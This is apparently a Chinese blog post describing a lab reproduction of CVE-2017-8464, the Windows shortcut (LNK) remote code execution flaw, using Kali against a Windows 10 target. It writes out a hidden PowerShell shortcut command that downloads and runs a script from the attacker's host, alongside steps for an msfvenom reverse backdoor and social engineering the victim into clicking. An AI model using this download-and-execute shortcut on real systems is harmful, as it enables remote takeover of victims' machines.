• CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现


    北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).

    CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

    CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

    攻击机 Kali

    IP: 192.168.1.113

    靶机:win10

    IP: 192.168.1.3

    1.使用msfvenom生成一个msf反弹后门

     

    2.将/opt 下的search.psl 复制到 /var/www/html 下

     

    3.启动apache服务service apache2 start

    4.在靶机上创建一个powershell远程快捷:

    C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.113/search.ps1');test.ps1"

    5.在kali下监听

    6.利用社会工程学误导靶机点击powershell快捷方式,kali就可以监听到了

    成功

    思考:当Apache启动之后,靶机可以通过访问192.168.1.113来触发spl,那么可以利用DNS劫持使靶机,引导靶机访问。 

  • 相关阅读:
    【Jenkins】jenkins 配置腾讯企业邮箱
    Monkey 用户指南(译)
    Windows,easygui 安装
    python笔记:list--pop与remove的区别
    递归--Java_汉诺塔
    appium安装 For windows
    【web开发--js学习】functionName 如果是一个属性值,函数将不会被调用
    python爬取煎蛋网图片
    pv&pvc
    docker
  • 原文地址:https://www.cnblogs.com/HsinTsao/p/7235931.html
Copyright © 2020-2023  润新知